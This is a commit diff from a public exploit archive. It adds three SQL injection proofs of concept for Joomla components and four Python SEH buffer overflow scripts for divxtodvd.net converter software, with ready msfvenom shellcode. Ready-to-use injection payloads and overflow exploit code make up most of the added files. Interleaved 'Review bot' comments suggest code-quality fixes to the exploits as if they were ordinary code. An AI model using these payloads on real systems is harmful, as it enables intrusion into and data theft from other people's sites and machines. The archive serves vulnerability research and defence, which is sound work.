DB: 2017-08-26

7 new exploits

MP3 WAV to CD Burner 1.4.24 - Buffer Overflow (SEH)

My Video Converter 1.5.24 - Buffer Overflow (SEH)

Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - Buffer Overflow (SEH)

Easy AVI DivX Converter 1.2.24 - Buffer Overflow (SEH)

Linux/x86-64 - execve /bin/sh Shellcode (25 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)

Linux/x86-64 - execve /bin/sh Shellcode (25 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)

Linux/x86-64 - execve /bin/sh Shellcode (31 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)

Linux/x86-64 - execve /bin/sh Shellcode (31 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)
Joomla! Component Bargain Product VM3 1.0 - 'product_id' Parameter SQL Injection
Joomla! Component Price Alert 3.0.2 - 'product_id' Parameter SQL Injection
Joomla! Component MasterForms 1.0.3 - SQL Injection
This commit is contained in:
Offensive Security 2017-08-26 05:01:24 +00:00
parent d4775ec75b
commit c388cc7a95
8 changed files with 343 additions and 4 deletions


@ -8918,6 +8918,7 @@ id,file,description,date,author,platform,type,port
39814,platforms/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
39820,platforms/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
39843,platforms/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local,0
42551,platforms/windows/local/42551.py,"MP3 WAV to CD Burner 1.4.24 - Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local,0
39845,platforms/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Privilege Escalation",2016-05-23,LiquidWorm,windows,local,0
39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Privilege Escalation",2016-06-06,"Gregory Smiley",windows,local,0
39902,platforms/windows/local/39902.txt,"League of Legends Screensaver - Unquoted Service Path Privilege Escalation",2016-06-07,"Vincent Yiu",windows,local,0
@ -8952,6 +8953,7 @@ id,file,description,date,author,platform,type,port
40148,platforms/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' (SEH)",2016-07-25,"Karn Ganeshen",windows,local,0
40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local,0
40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' (PoC)",2013-03-06,"Artem Shishkin",multiple,local,0
42550,platforms/windows/local/42550.py,"My Video Converter 1.5.24 - Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local,0
40169,platforms/linux/local/40169.txt,"VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation",2013-08-22,"Tavis Ormandy",linux,local,0
40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0
40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0
@ -9140,6 +9142,7 @@ id,file,description,date,author,platform,type,port
41873,platforms/osx/local/41873.sh,"GNS3 Mac OS-X 1.5.2 - 'ubridge' Privilege Escalation",2017-04-13,"Hacker Fantastic",osx,local,0
41875,platforms/linux/local/41875.py,"PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Kernel Privilege Escalation",2017-04-02,"Hacker Fantastic",linux,local,0
41878,platforms/windows/local/41878.txt,"Adobe Creative Cloud Desktop Application < 4.0.0.185 - Privilege Escalation",2017-04-13,hyp3rlinx,windows,local,0
42548,platforms/windows/local/42548.py,"Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local,0
41901,platforms/windows/local/41901.cs,"Microsoft Windows 10 (Build 10586) - 'IEETWCollector' Arbitrary Directory/File Deletion Privilege Escalation",2017-04-20,"Google Security Research",windows,local,0
41902,platforms/windows/local/41902.txt,"Microsoft Windows 10 - Runtime Broker ClipboardBroker Privilege Escalation",2017-04-20,"Google Security Research",windows,local,0
41904,platforms/multiple/local/41904.txt,"Oracle VM VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy",2017-04-20,"Google Security Research",multiple,local,0
@ -9195,6 +9198,7 @@ id,file,description,date,author,platform,type,port
42357,platforms/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",linux,local,0
42368,platforms/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,win_x86-64,local,0
42382,platforms/windows/local/42382.rb,"Microsoft Windows - LNK Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",windows,local,0
42549,platforms/windows/local/42549.py,"Easy AVI DivX Converter 1.2.24 - Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local,0
42385,platforms/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
42407,platforms/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",multiple,local,0
42418,platforms/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)",2017-08-02,Metasploit,windows,local,0
@ -16101,7 +16105,7 @@ id,file,description,date,author,platform,type,port
13649,platforms/windows/shellcode/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",windows,shellcode,0
13661,platforms/lin_x86/shellcode/13661.txt,"Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode",2010-04-02,anonymous,lin_x86,shellcode,0
13669,platforms/lin_x86/shellcode/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0
13670,platforms/lin_x86-64/shellcode/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes)",2010-04-14,Magnefikko,lin_x86-64,shellcode,0
13670,platforms/lin_x86-64/shellcode/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,lin_x86-64,shellcode,0
13671,platforms/lin_x86/shellcode/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0
13673,platforms/lin_x86/shellcode/13673.c,"Linux/x86 - DoS SLoc Shellcode (55 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0
13675,platforms/lin_x86/shellcode/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,lin_x86,shellcode,0
@ -16319,7 +16323,7 @@ id,file,description,date,author,platform,type,port
39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0
39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0
39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
@ -16399,12 +16403,12 @@ id,file,description,date,author,platform,type,port
41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve /bin/sh Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0
41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0
41827,platforms/win_x86-64/shellcode/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",win_x86-64,shellcode,0
41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes)",2017-04-13,WangYihang,lin_x86-64,shellcode,0
41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)",2017-04-13,WangYihang,lin_x86-64,shellcode,0
41909,platforms/lin_x86/shellcode/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode,0
41969,platforms/lin_x86/shellcode/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode,0
41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0
42016,platforms/windows/shellcode/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",windows,shellcode,0
42126,platforms/lin_x86-64/shellcode/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode,0
42126,platforms/lin_x86-64/shellcode/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode,0
42177,platforms/lin_x86/shellcode/42177.c,"Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,lin_x86,shellcode,0
42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0
42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0
@ -36915,6 +36919,9 @@ id,file,description,date,author,platform,type,port
39145,platforms/cgi/webapps/39145.txt,"Xangati XSR / XNR - 'gui_input_test.pl' Remote Command Execution",2014-04-14,"Jan Kadijk",cgi,webapps,0
39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar - 'day_view.php' SQL Injection",2014-04-14,"Daniel Godoy",php,webapps,0
39150,platforms/php/webapps/39150.txt,"Open Audit - SQL Injection",2016-01-02,"Rahul Pratap Singh",php,webapps,0
42552,platforms/php/webapps/42552.txt,"Joomla! Component Bargain Product VM3 1.0 - 'product_id' Parameter SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps,0
42553,platforms/php/webapps/42553.txt,"Joomla! Component Price Alert 3.0.2 - 'product_id' Parameter SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps,0
42554,platforms/php/webapps/42554.txt,"Joomla! Component MasterForms 1.0.3 - SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps,0
39153,platforms/php/webapps/39153.txt,"iDevAffiliate - 'idevads.php' SQL Injection",2014-04-22,"Robert Cooper",php,webapps,0
39156,platforms/cgi/webapps/39156.txt,"ZamFoo - Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
39157,platforms/php/webapps/39157.txt,"Puntopy - 'novedad.php' SQL Injection",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0


28
platforms/php/webapps/42552.txt Executable file
View file

@ -0,0 +1,28 @@
# # # # #
# Exploit Title: Joomla! Component Bargain Product VM3 1.0 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://www.weborange.eu/
# Software Link: https://www.weborange.eu/extensions/index.php/extensions-vm3/bargain-product-vm3-detail
# Demo: http://www.weborange.eu/demo/index.php/bargain-product
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=brainy&product_id=[SQL]
# http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=alice&product_id=[SQL]
#
# 17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31
#
# Etc..
# # # # #
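Review bot: The `# Description:` line states only that the flaw "allows an attacker to inject sql commands...." and the header has no vendor-notification, fixed-version or mitigation field, so a reader cannot tell whether 1.0 is the last affected release or whether a patched build exists; a `# Vendor Status:` line (notified / fix available / unknown) and a short `# Fix:` line pointing at parameterised queries for the `product_id` parameter would complete the advisory. The `# Exploit Title:` line also omits the `'product_id' Parameter` qualifier that the files.csv index entry for 42552 carries, so the two titles disagree; use the same title in both. The same two points apply to the 42553 and 42554 files added in this commit (the index entry for 42553 names the parameter, its txt title does not; 42554's PoC targets `formid`, which neither title mentions).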

27
platforms/php/webapps/42553.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Joomla! Component Price Alert 3.0.2 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://www.weborange.eu/
# Software Link: https://extensions.joomla.org/extensions/extension/extension-specific/virtuemart-extensions/price-alert/
# Demo: https://www.weborange.eu/extensions/index.php/extensions-vm3/price-alert-detail
# Version: 3.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?option=com_price_alert&view=subscribeajax&task=pricealert_ajax&product_id=[SQL]
#
# 64+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
#
# Etc..
# # # # #

27
platforms/php/webapps/42554.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Joomla! Component MasterForms 1.0.3 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://masterformsbuilder.com/
# Software Link: https://www.joomlamasterforms.com/download?file=masterforms_v.1.0.3_j3.3.zip
# Demo: https://demo.masterformsbuilder.com/
# Version: 1.0.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?option=com_masterforms&layout=form&formid=[SQL]
#
# 1'+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)--+-
#
# Etc..
# # # # #


@ -0,0 +1,59 @@
#!/usr/bin/python
###############################################################################
# Exploit Title: Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: Easy Video to iPod/MP4/PSP/3GP Converter
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.5.20
# Software Link: http://www.divxtodvd.net/easy_ipod_mp4_psp_3gp.exe
# Tested On: Windows 7 x64
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
buffer = "\x41" * 1008
nSEH = "\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = "\x90" * 16
badchars = "\x0a\x0d"
data = buffer + nSEH + SEH + nops + buf
f = open ("pyramid.txt", "w")
f.write(data)
f.close()
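Review bot: `badchars` is bound twice in this script — `badchars = "\x00\x0a\x0d"` right after `SEH`, then `badchars = "\x0a\x0d"` just before `data` is assembled — and neither binding is read anywhere, so both assignments are dead and they disagree about whether 0x00 is in the excluded set; keep a single definition that matches the `-b` argument recorded in the msfvenom comment and delete the other. The output file is opened with a bare `open()`/`close()` pair, so an exception in `f.write` leaves the handle open; `with open("pyramid.txt", "w") as f:` followed by `f.write(data)` replaces the last three lines. The header comment's `# Vulnerable Software:` line names the product without its version while `# Version:` repeats it separately; fine, but the "To reproduce" steps could state that `pyramid.txt` is written to the current working directory, which is what the relative path implies. The same three points apply verbatim to the other three scripts in this commit (Easy AVI DivX Converter, My Video Converter, MP3 WAV to CD Burner), which share this body line for line.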


@ -0,0 +1,59 @@
#!/usr/bin/python
###############################################################################
# Exploit Title: Easy AVI DivX Converter 1.2.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: Easy AVI DivX Converter
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.2.24
# Software Link: http://www.divxtodvd.net/easy_avi_converter.exe
# Tested On: Windows 7 x64
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
buffer = "\x41" * 1008
nSEH = "\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = "\x90" * 16
badchars = "\x0a\x0d"
data = buffer + nSEH + SEH + nops + buf
f = open ("pyramid.txt", "w")
f.write(data)
f.close()


@ -0,0 +1,59 @@
#!/usr/bin/python
###############################################################################
# Exploit Title: My Video Converter 1.5.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: My Video Converter 1.5.24
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.5.24
# Software Link: http://www.divxtodvd.net/my_video_converter.exe
# Tested On: Windows 7 x64
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
buffer = "\x41" * 1008
nSEH = "\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = "\x90" * 16
badchars = "\x0a\x0d"
data = buffer + nSEH + SEH + nops + buf
f = open ("pyramid.txt", "w")
f.write(data)
f.close()


@ -0,0 +1,73 @@
#!/usr/bin/python
###############################################################################
# Exploit Title: MP3 WAV to CD Burner 1.4.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: MP3 WAV to CD Burner
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.4.24
# Software Link: http://www.divxtodvd.net/mp3_cd_burner.exe
# Tested On: Windows 7 x64
# All the vendor's softwares below are affected to this bug which all can be found in http://www.divxtodvd.net/ till date 24-08-2017 .
# Easy MPEG/AVI/DIVX/WMV/RM to DVD
# Easy Avi/Divx/Xvid to DVD Burner
# Easy MPEG to DVD Burner
# Easy WMV/ASF/ASX to DVD Burner
# Easy RM RMVB to DVD Burner
# Easy CD DVD Copy
# MP3/AVI/MPEG/WMV/RM to Audio CD Burner
# MP3/WAV/OGG/WMA/AC3 to CD Burner
# Easy MOV Converter
# Easy Video to iPod Converter
# Easy Video to PSP Converter
# Easy Video to 3GP Converter
# Easy Video to MP4 Converter
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
buffer = "\x41" * 1008
nSEH = "\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = "\x90" * 16
